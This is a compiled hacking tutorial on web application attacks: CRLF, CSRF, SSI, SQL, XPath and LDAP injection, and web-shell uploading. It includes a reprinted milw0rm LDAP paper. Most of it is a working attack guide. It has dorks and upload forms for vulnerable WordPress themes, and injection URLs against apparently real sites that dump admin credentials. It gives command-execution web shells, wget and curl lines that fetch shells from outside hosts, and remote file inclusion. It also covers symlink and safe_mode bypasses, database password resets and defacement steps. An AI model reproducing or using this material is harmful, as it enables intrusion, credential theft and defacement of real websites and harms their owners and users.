CRLF : 1) CRLF? Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are adding new row (n). 2) Vulnerable places Vulnerable places are anywhere. In this tut. I'm gonna use some chat. 3) Exploiting vulnerability and protection Lets say if you send message chat will look like this: Code: 1.4.2012 10:29 - fodex: Why login page is down? 1.4.2012 10:29 - saiR: Look like somebody deleted login database. 1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you. 1.4.2012 10:30 - saiR: Ok go ahead...n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php If chat is vulnerable, it's gonna look like this: Code: 1.4.2012 10:30 - saiR: Ok go ahead... 1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php We wrote second msg from Admin and users will think that Admin sent it actually and will log in to site we gave them. With login we are gonna keylog site logins. 4) Vulnerable script e.g. Code: <?php if(isset($_POST['send_message'])) { if(!empty($_POST['message'])) { $message = htmlspecialchars($_POST['message']); // rest code to send msg } } ?>
CSRF : 1) CSRF? Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute something without knowing username. 2) Vulnerable places Can be used when you are using GET method. If CSRF is dont successfully, attacker can change password of some user. Most common vulnerable places are avatars. 3) Exploiting vulnerability Lets say we have profile link: Code: http://www.link.com/profile.php Where you can see user data (username, avatar, email...). Now when user want to edit his profile using e.g. Code: http://www.link.com/edit_profile.php Now instead of avatar link we gonna add link from profile editing together with new code using GET method. NOTE: We have to use GET method during profile editing otherwise we wont be able to attack. Add avatar link: Code: http://www.link.com/edit_profile.php?password=newpassword password is name of input (It can be different, it's best to chekc source code) Now when we look at avatar we wont be able to see picture (like there is no picture). When other user watch your avatar, if attack was successful, his password is gonna be changed in one we put. 4) Example Of CSRF File Uploading Vulnerability. 1. Wordpress Amplus Themes CSRF File Upload Vulnerability 2. Wordpress Dimension Themes CSRF File Upload Vulnerability 3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability 4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability
1. Wordpress Amplus Themes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/amplus Exploit & POC : http://site-target/wp-content/themes/amplus/functions/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php 2. Wordpress Dimension Themes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/dimension Exploit & POC : http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload- handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form>
File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php 3. Wordpress Euclid Themes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/euclid_v1 Exploit & POC : http://site-target/wp-content/themes/euclid/functions/upload-handler.php http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
4. Wordpress theCotton Themes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/thecotton_v114/ Exploit & POC : http://site/[patch]/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp- content/themes/make_a_statement/library/includes/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form>
Server Side Includes | Server Side Inclusion : 1) Introduction Server Side Includes Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update DB, send mails and many other functions. SSI is working like when some run script on that site. Default extension for SSI files is .shtml To get SSI working in that directory where is .shtml is located must be .htaccess file, which holds some configuration included inside file. SSIs is by default disabled you can enable it by creating new .htaccess file with this config: Code: AddType text/html .shtml AddHandler server-parsed .shtml AddHandler server-parsed .html Options Indexes FollowSymLinks Includes 2) SSI creating We are starting script with <!--# Some simple script look like this: <command> <variable>=<variable content>--> Code: <command> - config include flow set printenv echo exec fsize flastmod time & date With --> we end script. script e.g. Code: <!--#include file="yourfilename.txt" --> <!--#echo var='This will write this stupid text.'--> 3) Server Side Inclusion Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have primary knowledge of Bash and Batch programming.
Site is vulnerable on SSI when extensions ‘.shtml’ ‘.shtm’ or ‘.stm’, are included in Apache config file. e.g. we can create file with next command: Code: <!--#exec cmd='ls -la'--> Save this as .shtml file and open it on site. I think you already know what is going to happen. Hope this helped you!
Symlink Attack : 1] Upload shell 404.php 2] Upload contact.php & database.php > eg : http://getec.com.ar/wp-content/plugins/akismet/database.php > eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php 3] go to [sec. info] in your shell then [readable : etc/passwd <view>] 4] copy all username & passwd from [ etc/passwd ] 5] paste in [ http://site.com/contact.php ] [ config fucker ] tab. 6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ] > eg : http://getec.com.ar/wp-content/plugins/akismet/database.php > eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/ 7] on configweb page [ you have some text that contain user & password ] [ these files are reverse or linked website details ] 8] Now login to them using database.php [ change password in database ] 9] login to main site then and deface there index.php page. Malware Attachment On Website : 1] Go to Public Html tab on your 404.php shell & 2] Open .htaccess on your shell 3] and past your malware coading.
Sql injection String & Union based : 1. Sql injection String based [1] Decreption In String based Sql injection : "order by" doesn't work, example: order by 100-- "group by" doesn't work "having 1=2" doesn't work queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi) [2] Example Solution to this issue in order to hack a site with String Based SQL injection The answer to this problem is by using the following format while trying to hack a site with SQLi http://site.com/index.php?id=10' order by 1000--+ That will show us the error, hence displaying the results according to our query. The point here is that we used the quote ' and the + sign in our query id=X' order by--+ Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we String-Union Based SQL injection 1. Obtaining the number of columns (in this example, we'll use 10 columns) http://www.site.com/index.php?id=234' order by 11--+ Results show error, so we'll assume as 10 columns, since it'll be an example for our process 2. Obtaining the Databases
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+ Results will display the databases on their website Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step 3.Obtaining the Tables from the current Database http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+ Results will display the current table names For this example, we'll be using the table name: "admin" 4. Obtaining Column names from a specific table (which in this example is "admin") http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+ Results will display the column names from the current table To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php For this example, we'll use "username" and "password" as our column names 5.Obtaining Data from Column names http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+ 6. Example : 1. http://www.onthegro.co.za/content.php?id=latest_news' 2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+ 3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+ 4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+ 5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+ 6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+ 7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+ 8. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+
9. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(table_name,0x0a),4 from information_schema.tables where table_schema=database()--+ 10. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(column_name,0x0a),4 from information_schema.columns where table_name=0x61646d696e--+ 11. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+ 2. Sql injectionUnionbased : [1] Example http://www.naukriguru.com 1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100 2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10 3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20 4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50 5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40 6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30 7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35 8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33 9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32 10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31 11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31— 13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31— 14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31— 15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31— 16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31—
17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31— 18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31— 19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31 from information_schema.tables where table_schema = database()— 20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31 from information_schema.columns where table_name = 0x6e675f61646d696e— 21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from ng_admin— 22. http://www.naukriguru.com/admin/ 23. http://www.naukriguru.com/admin/index.php# 24. http://www.naukriguru.com/admin/add_industry.php
Xpath Injection : Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))-- Eg: http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers ion()))-- msg: Could not query:XPATH syntax error: ' 5.5.32-cll' ===================================================================== Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+ Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+ msg: Could not query:XPATH syntax error: ' :RecipeIngredients' --------------------------------------------------------------------------------------------------------------------- Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4... Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+ msg: Could not query:XPATH syntax error: ' :SS_categories' --------------------------------------------------------------------------------------------------------------------- Respectively :~ For 2,3,4,5,6,7,8..... msg : Could not query:XPATH syntax error: ' :SS_ordered_carts' Could not query:XPATH syntax error: ' :SS_orders' Could not query:XPATH syntax error: ' :SS_products' Could not query:XPATH syntax error: ' :SS_products2' Could not query:XPATH syntax error: ' :SS_special_offers' Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details' Could not query:XPATH syntax error: ' :productrange' Could not query:XPATH syntax error: ' :recipes' Could not query:XPATH syntax error: ' :visitors' ===================================================================== Note : Convert table name to HEX [String to hex conversion] Eg : details : 64657461696c73 or 0x64657461696c73 ===================================================================== Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name=0x64657461696c73 limit 0,1)))--+ Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from /*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit 0,1)))--+ msg: Could not query:XPATH syntax error: ' :cust_firstname' --------------------------------------------------------------------------------------------------------------------- Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4... Respectively :~ For 2,3,4,5,6,7,8..... msg: Could not query:XPATH syntax error: ' :cust_lastname' msg: Could not query:XPATH syntax error: ' :cust_country' msg: Could not query:XPATH syntax error: ' :cust_zip' msg: Could not query:XPATH syntax error: ' :cust_state' msg: Could not query:XPATH syntax error: ' :cust_city msg: Could not query:XPATH syntax error: ' :cust_address' ===================================================================== Note : In case I got :
Table -> users Columns -> Password & Email So, ===================================================================== Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select concat(email,0x3a,password) from users limit 0,1)))--+ Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from /*!users*/ limit 0,1)))--+ msg: Could not query:XPATH syntax error: ' :email:password' ===================================================================== =====================================================================
LDAP injections : ---[ 0x01: Introduction ] The technique of LDAP (Lightweight Directory Access Protocol) is a lightweight protocol to access the directory service X.500. This protocol works over TCP/IP. The access protocol LDAP is used to query and modify objects stored. ---[ 0x02: Filters LDAP ] It is quite important to understand how does the LDAP filters work. FC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515). Filter = ( filtercomp ) Filtercomp = and / or / not / item And = & filterlist Or = | filterlist Not = ! filter Filterlist = 1*filter Item = simple / present / substring Simple = attr filtertype assertionvalue Filtertype = "=" /"~="/ ">=" / "<=" Present = attr = * Substring = attr "=" [initial] * [final] Initial = assertionvalue Final = assertionvalue Logical operators: - AND "&" - OR "|" - NOT "!" Relational operators: <=, >=, =, ~= The wildcard "*" It is used to replace characters. Filter example: (&(objectClass=user)(uid=*)): We return a list of all objects of type user, no matter
which takes the value of the attribute "uid." ---[ 0x02: LDAP injection in Web Applications ] The technique Ldap injection is very similar to SQL injection. The attack technique is used to operate websites built LDAP judgments directly from data supplied by the user. Vulnerable code with comments (by Sacha Faust): +++++++++++++++++++++++++++++++++++++ line 0: <html> line 1: <body> line 2: <%@ Language=VBScript %> line 3: <% line 4: Dim userName line 5: Dim filter line 6: Dim ldapObj line 7: line 8: Const LDAP_SERVER = "ldap.example" line 9: line 10: userName = Request.QueryString("user") line 11: line 12: if( userName = "" ) then line 13: Response.Write("<b>Invalid request. Please specify a valid user name</b><br>") line 14: Response.End() line 15: end if line 16: line 17: line 18: filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry line 19: line 20: line 21: 'Creating the LDAP object and setting the base dn line 22: Set ldapObj = Server.CreateObject("IPWorksASP.LDAP") line 23: ldapObj.ServerName = LDAP_SERVER line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com" line 25: line 26: 'Setting the search filter line 27: ldapObj.SearchFilter = filter line 28: line 29: ldapObj.Search line 30:
line 31: 'Showing the user information line 32: While ldapObj.NextResult = 1 line 33: Response.Write("<p>") line 34: line 35: Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>") line 36: For i = 0 To ldapObj.AttrCount -1 line 37: Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" ) line 38: Next line 39: Response.Write("</p>") line 40: Wend line 41: %> line 42: </body> line 43: </html> +++++++++++++++++++++++++++++++++++++ In line 10 note userName variable is initialized with the value the parameter user and then quickly validated to see if the value is zero. If the value is not zero, the variable userName is used to initialize the variable filter on line 18. This new variable is used directly to build an LDAP search to be used in the call to SearchFilter on line 27 The attacker has full control over what will be consulted on the LDAP server. You will get the result of the consultation when the code reaches of the line 32 to 40, all results and its attributes are displayed to the user. Example 1: http://website/ldap.asp?user=* In this example dispatched the character "*" parameter in the "user" which ends in the variable filter. This judgment LDAP will show any object that has an attribute uid. We show all users and their information. Example 2: http://website/ldap.asp?user=ka0x)(|(homedirectory=*)
It will show us the path to the user ka0x. They can do tests with the code before they leave. ---[ 0x03: Links ] http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protoc ol http://es.wikipedia.org/wiki/LDAP http://www.ldapman.org/ __EOF__ # milw0rm.com [2007-11-04] © Offensive Security 2011
Part 2 Web server Hacking Using above vulnerabilities various type of hacks that can be used to hack web server. Guide content:  Shell Uploading Guide  Shell uploading through php-my-admin  Shell Jumping  Symlink Bypass 2013 forLinux Servers  Hack Web-DAV & Deface  Root server without local root exploit  LINUX SERVER ROOTING Tutorial  Cpanel Cracking  Bypass 403 ForbiddenAndCant Read /Etc/Named.Config Error  Backdoor a WEB SERVERS WITH WEBACOO  Web Server Hacking through Command Injection  How To Hack Windows Servers Using Dubrute 2.2  Symlink Tutorial for beginners  MASS DEFACETUTORIAL  How to hack a websites using Symlink Bypassing  ATTACKING WEBSERVERS VIA .HTACCESS  How to Back-connect withnetcat  Hacking Cold FusionServers - Part I  Hacking Cold FusionServers - Part II
So let’s get started ! 1. Shell Uploading Guide Many newbie’s face problem while uploading shell on a site after getting admin access/ logging in to that site. So, I am writing this in order to help them. Basically shell gives us remote access to that server. Such shells are available in different language like php, asp/aspx, cgi etc. So, we have to choose a shell that will work on the server according to the server script. If the server supports php shell then we have to choose any of the php shell Otherwise asp & cgi. now, let’s come to the Main point…. AFTER LOGGING IN TO THE SITE IF WE FOUND ANY UPLOAD OPTION IN THE SITE , THEN WE CAN EASILY UPLOAD SHELL. But sometimes we have to do some changes to upload a shell. Way 1 AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENTION. If so happens then just rename the shell name. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the shell name was shell.php, then we will rename it as shell.php.jpg or anything else. Way 2 Upload a simple uploader shell first that isn’t detected by Antivirus and firewalls. THEN UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD A UPLOADER SHELL FROM HERE .
WAY 3 FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE headers & don’t allow us to upload a shell. so we can bypass it by using “GIF89A SHELL SCRIPT BYPASS” Method. open your shell in notepad. add “GIF89a;” without quote before the shell code starts. liKe below… GIF89a; Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the gif header and assuMes its safe since it’s a iMage. WAY 4 This method is more advanced. This only works for client side filters rather than server side. download firebug for Firefox, then edit the html of the upload . <form enctype="multipart/form-data" action="uploader.php" method="POST"> Upload DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br /> <input type="submit" value="Upload File" /> </form> Change the filter accept. to *.* or just remove it completely , it will then let you upload any type of file. WAY 5 Download “LIVE HTTP HEADERS” addon first for your firefox browser 1. Rename your shell name to shell.php.jpg (or whatever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.) 2. Open Firefox & Start your Live HTTP Headers addon, after that upload your shell. 3. Then your Live HTTP Headers will look something similar to this
4. Then click on the shell.php.jpg, after click on Reply button. 5. Then again a new window will open, in that window there will be two boxes, but we have to work on second box. 6. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button
WAY 6 Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc. "; system($_GET['cmd']); echo ?> now rename your jpg to .php and upload. WAY 7 Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the “tamperdata” Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. If u have any problem to upload a shell using tamperdata, then just do a simple google search. So many video tutorials on this is available in web. So I am not explaining this step by step.
WAY 8 All the above mention way works when we find an upload button on the site. but when there is no upload button, it’s not easy to upload a shell there. we can try few things…… We have to find out if there is a edit option of an existing php/asp/aspx page. If there is a edit option then open that page & delete whole script. After that, open your shell in notepad. Copy the script, paste to that page. Finally, save it. Now that link will be your shell. possibly we can find edit option in the following pages of a site…… Contact us.php/ Contact us.asp Class.php/ Class.asp About us.php/about us.asp Terms.php/terms.asp nb: in some news, vehicles shelling, cart etc sites, don’t have any option to upload a file after logging in through admin panel. They only allow file upload after logging through cpanel. WAY 9 SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO EXECUTE A SHELL FROM ANOTHER HOSTINGSITE. METHOD…….. 1) UPLOAD YOUR SHELL IN A FREE HOSTINGSITE LIKE www.my3gb.com www.3owl.com , www.ripway.com , , www.000webhost.com , etc. 2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE SITE IS www.site.com 3) Now we have to execute this following command to gain shell access to that site. http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt 4) REPLACE THE SITE LINK IN THE COMMAND ACCORDINGTO YOUR SHELL & VULERABLE SITE LINK. SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS. 1.Joomla Site: After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager > check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit html now paste ur shell code and click save...done site.com/templates/template name/index.php like site.com/templates/beez/index.php 2.Wordpress: login into admin panel expand Appearance then click on editor > u will find style.css now select 404.php on right side paste ur shell code and click edit file u can find shell in site.com/wp-content/themes/theme name u edit/404.php
3.Vbulletin: 1-Log in admin cp 2-Under “Plugins & Products”,select Add New Plugin 3-Adjust the settings as follows: Product: vBulletin Hook Location: global_start Title: (Anything …) Execution Order: 5 Code: ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean(); Plugin is Active : Yes 4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager 5-Under whatever the default style is in the dropdown menu, select Edit Templates. 6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME. 7-Search Code: $header Somewhere near the top.Replace it with: Code: $header $execcode 8-Now go to the forum and add after the index.php Code: ?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php So it looks like Code: http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php What this does is shell.txt downloads, and renames shell.php Now, the shell must be located in the directory shell.php forums … If not, then wget is disabled on that server,you can try alternative methods: http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php 4.SMF: login into admin panel u need to download any smf theme in zip format and put ur shell.php in it and save admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php :) after upload shell will find > site.com/Themes/theme name/shell.php
5.IPB: login admin panel > Look and Feel >Manage Languages, choose language > section (example) public_help edit: help.txt Choose topic from list, or search for a topic In right box add the below code: ${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}} ${${print $out}} When you add it, specify go on bottom Now we go on http://www.site.com/index.php?app=core&module=help And our code we add will be done, and you will get your shell @ www,site.com/cache/shell.php 6.phpBB login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html At down of: We add: fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); And save it.Now go on: www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shel l.txt shell find in site path/shell.php Mybb forum login admincp > Go to Templates and Styles, find default MyBB Theme is. Then go to Templates, expand templates that are used by the current theme. Find Calendar templates, click it. Click 'calender'. Above all the html code, paste this:http://pastebin.com/nA3asuNz save :) shell will b find in site.com/calendar.php note: if u got error like "code is danger unable to edit " then simply paste ur deface code to deface calendar.php
Tutorial shell uploading through phpmyadmin Requirements:- -You must have the full path -pma & mysql db privileges. Its not every day u get to use this its rare, but today i exploited a site by this so thought of writing a tutorial. Ok then lets start. First login in to mysql now click 'Show MySQL system varible"
then 'SQL'. now you can run sql commands,like create db, delete tables or whatever. we want to upload shell so lets move on to it. now we will create a cmd line into a new file,with select into. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz/r57.txt;mv r57.txt shell.php N thats it, we have shell on the server xD
Shell Jumping Requirement : shell b374k (Click On the link you will get a php file just right click and select save or press ctrl+ s From Keyboard save it by any name like hacker.php, myshell.php or darksite.php ) Follow these steps  Now after uploading shell Click On Local Domain To view all websites based on same server Check for readable  Now choose any website from Local host domain list and copy Senarai User value then goto home and paste in view file/folder after home/replacethiskeyword/public_html/ for example current view file/folder value = home/abc/public_html and your website's Senarai User value (username) is xyz then view file/folder value will be home/xyz/public_html/  After Going to that Folder Look for MySQL confiq (wp-config.php in wordpress and configuration.php for joomla ) now open The file and you'll Got database username and password here : it will Looks like Username = /** MySQL database username */ define('DB_USER', 'googlyma_wrdp1');
PASSWORD = /** MySQL database password */ define('DB_PASSWORD', 'PHZ2hum6{{KE');  Now Conncet to MYSQL datbase with username and Password and enter this SQL Query UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';  Now what we have did it goto : http://webste.com/wp-admin/and login with Username and password Log in with user name admin and password as 123456 And You have successfully done it.
Symlink Bypass 2013 for Linux Servers Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers . For This First You Need the Following Files :  Sen Haxor CGI Shell  sen.zip  passwd-bypass.php  Turbo Brute force Cpanel  Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with 
<? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?> So after creating php.ini and ini.php upload the other files to the server . BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat Commonly all of the above have root path like /root/var/www/vhost/ where all sites will be under vhost directory . But you wont have permission to view it so we will create a symbolic link to root and view the site and symlink the config files Make a new directory in your shell example sen then upload sen.zip . Then use this command to unzip the file and create a symbolic link to root . Command : unzip sen.zip Note : In some servers unzip command wont work so you can manually create a symlink to root by using the command ln -s / root Then You will see this $ unzip sen.zip Archive: sen.zip
linking: sen.txt -> / finishing deferred symbolic links: sen.txt -> / This means a symbolic link has been created to / root .  Now we need to upload .htaccess use the following Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites . BYPASSING SYMLINK ON APACHE AND LITESPEED Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not found and 500 Internel Server Error These can be Bypass By Using Different .htaccess individually. BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers . First for this make a new directory in your shell example sen then upload sen.sa and .htaccess from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755 Then Open the Cgi Shell Login ( Password : senhaxor) Now there are several methods to bypass 403 forbidden You need to try all the following methods . Atleast one will give you success . Method 1 : .shtml method This is the commonly used method by most of the hackers to bypass 403 forbidden Error . So before we procced first you need to get all /etc/passwd from the server so that we can find 